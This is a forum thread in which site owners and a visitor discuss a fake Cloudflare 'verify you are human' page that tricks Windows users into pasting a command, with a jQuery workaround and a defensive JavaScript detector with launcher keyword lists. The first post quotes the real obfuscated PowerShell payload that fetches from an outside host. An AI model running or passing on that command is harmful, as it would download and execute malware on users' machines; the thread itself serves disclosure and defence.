Fake Cloudflare bot verification page malware

What is the name of the domain?

https://albatrosship.com/

What is the issue you’re encountering

Phishing - Malware

What steps have you taken to resolve the issue?

Website presented a Cloudflare verification page. But when clicked, the page says “Unusual web traffic detected” and provides steps to resolve this manually. The steps are to open Windows Run by pressing the Win + R buttons and pasting the text they provide.
The text looks like this on the website → “Ι am nοt a rοbοt: Clοudflare Verificatiοn ΙD: 6RM-42B”
But when copied by the copy button next to it this is what it contains → “POwErsHeLL -w 1 & \W*\\\\\\\\\\\\\\\S2\\\\\\mht*e https://black.hologramm.us/ # ‘‘Ι am nοt a rοbοt: Clοudflare Verificatiοn ΙD: 6RM-42B’’”

Was the site working with SSL prior to adding it to Cloudflare?

Yes

What is the current SSL/TLS setting?

Off

Please report this to the Trust & Safety team using the abuse page here: https://abuse.cloudflare.com/

Good luck!

1 Like

I’ve tried everything to remove this malware, or at least identify where it’s generated.

No server-side or local malware scanners have detected anything, and there doesn’t seem to be much information on the internet at this point.

For those who might find it useful, what I’ve done is create a small JavaScript that prevents this screen from popping up, so your users can access it normally.

Simply add this code to your website:

At the moment, you don’t have any sites using Cloudflare. When did you first start to see the malware page?

The phishing script is injected via a Cloudflare Worker, at least in other sites that I have observed, so the attackers have somehow gotten access to your account.

1 Like

Hi, do you mind posting the script? I can’t find it.

My site didn’t have Cloudflare, and my hosting didn’t configure it for me either. The malware started about 10 days ago.

Sorry I didn’t paste the code. It’s simply to make the iframe it creates disappear, so users don’t see it and can browse. But it doesn’t delete it.

In my case, it’s a WordPress with WooCommerce, and it puts the code in the last div. I imagine it will also put it in your last div, whether it’s WordPress or not.

<script type="text/javascript">
jQuery(document).ready(function(){
  // jQuery's .css() cannot set the !important flag, so values such as
  // "none !important" are silently dropped by the browser; setProperty()
  // on the element's own style object accepts the priority argument.
  jQuery("div:last").each(function(){
    this.style.setProperty("z-index", "0", "important");
    this.style.setProperty("display", "none", "important");
  });
});
</script>

And just in case it gives any clues: in my case, if I was logged in to WordPress, it didn’t appear.

And when I wasn’t logged in, it appeared randomly. For example, it didn’t appear with Linux or Ubuntu, but it did with Windows. Also, if I accessed it with a VPN or proxies, it appeared in some cases, but not in others. And as far as I could tell, I found no trace of it in my database or files, so I think it might be injecting a call to an external JavaScript.

For the Cloudflare team, my affected website is: https://certyfile.com
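The two halves of the lure quoted earlier in this thread (the displayed text spelled with Greek lookalike letters, and the clipboard payload that hides the decoy text behind a `#` comment) can both be recognised from the browser side. The following is an added example, not code from the thread or from Cloudflare: the pure functions run under Node for testing, and the guard at the bottom installs itself only when a `window` exists. The confusable table, the launcher keyword list and the sample payload are assumptions constructed for the example, modelled on the strings quoted above, not a complete catalogue.

```javascript
// Added example, not code from the thread: client-side detector for the ClickFix
// lure described above. Pure functions first; the browser hook only installs
// itself when a window object exists, so the file also loads under Node.

// Lookalike letters seen in the lure ("Clοudflare" with Greek omicron, "ΙD" with
// Greek capital iota). This table is an assumption: it covers the characters
// quoted in the thread plus a few common Cyrillic confusables, not all of Unicode.
const CONFUSABLES = {
  '\u03BF': 'o', // Greek small omicron
  '\u039F': 'O', // Greek capital omicron
  '\u0399': 'I', // Greek capital iota
  '\u0391': 'A', // Greek capital alpha
  '\u0395': 'E', // Greek capital epsilon
  '\u0421': 'C', // Cyrillic capital Es
  '\u0430': 'a', // Cyrillic small a
  '\u0435': 'e', // Cyrillic small ie
  '\u043E': 'o', // Cyrillic small o
  '\u0440': 'p', // Cyrillic small er
};

// Replace each known lookalike with its Latin counterpart so keyword matching works.
function foldConfusables(text) {
  return Array.from(text, ch => CONFUSABLES[ch] ?? ch).join('');
}

// Number of lookalike characters present: a plain Latin string scores 0.
function confusableCount(text) {
  let n = 0;
  for (const ch of text) if (ch in CONFUSABLES) n++;
  return n;
}

// Visible lure text: a brand or CAPTCHA phrase spelled with lookalike letters.
// A genuine Cloudflare page uses plain Latin letters and is not flagged.
function looksLikeClickFixLure(displayed) {
  const folded = foldConfusables(displayed).toLowerCase();
  const phrase = /cloudflare|captcha|verification id|i am not a robot/;
  return phrase.test(folded) && confusableCount(displayed) > 0;
}

// Clipboard payload: a Windows launcher followed by a URL, with the decoy text
// parked after "#" so it becomes a comment when pasted into Run or PowerShell.
function isClickFixPayload(clipboardText) {
  const [command, ...rest] = String(clipboardText).split('#');
  const comment = rest.join('#');
  const cmd = command.toLowerCase();
  // Case-mangled names such as "POwErsHeLL" fold back to plain keywords.
  // Keyword list is an assumption, not an exhaustive set of Windows launchers.
  const hasLauncher = /\b(powershell|pwsh|mshta|cmd|rundll32|bitsadmin|wscript|cscript|certutil|curl)\b/.test(cmd);
  // Wildcard paths such as \W*\S2\mht*e let the shell expand an executable
  // name that never appears literally in the string.
  const hasWildcardPath = /\\[a-z0-9]*\*/i.test(command);
  const hasUrl = /https?:\/\//.test(cmd);
  const decoyComment = comment.length > 0 && looksLikeClickFixLure(comment);
  return (hasLauncher || hasWildcardPath) && (hasUrl || decoyComment);
}

// Browser-only stopgap in the spirit of the jQuery snippet above: refuse
// clipboard writes that carry the payload so the lure's "copy" button hands the
// user nothing dangerous. Like the snippet, it does not remove the injection.
function installClickFixGuard(win) {
  const clip = win.navigator && win.navigator.clipboard;
  if (clip && typeof clip.writeText === 'function') {
    const originalWriteText = clip.writeText.bind(clip);
    clip.writeText = text => {
      if (isClickFixPayload(text)) {
        console.warn('ClickFix guard: blocked clipboard write');
        return Promise.reject(new Error('blocked suspicious clipboard write'));
      }
      return originalWriteText(text);
    };
  }
  // Older loaders select a hidden textarea and call document.execCommand('copy');
  // cancelling the copy event without calling setData leaves the clipboard unchanged.
  win.document.addEventListener('copy', ev => {
    const selected = win.getSelection ? String(win.getSelection()) : '';
    if (isClickFixPayload(selected)) {
      ev.preventDefault();
      console.warn('ClickFix guard: blocked copy event');
    }
  }, true);
}

if (typeof window !== 'undefined') installClickFixGuard(window);
```

Because the injected script runs in the same origin as the page, an attacker who notices the guard can bypass it, so this is a containment measure for visitors while the injection point is being located, not a fix. The same two functions are also useful server-side or in a crawler: run `looksLikeClickFixLure()` over rendered page text and `isClickFixPayload()` over any string passed to a copy handler to spot infected pages on a site you are responsible for.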

I’ve just found a nice article on how the fake captcha is loaded: EtherHiding and ClickFix: new mask of social engineering campaign

As for your site, maybe you could avoid getting infected by malware if you installed updates every once in a while:

x-powered-by: PHP/8.1.10
server: Apache/2.4.57

PHP 8.1.10 was released in September 2022, Apache 2.4.57 in April 2023.

1 Like

It’s not my site. I’ve just come across the suspicious verification page while browsing.

2 Likes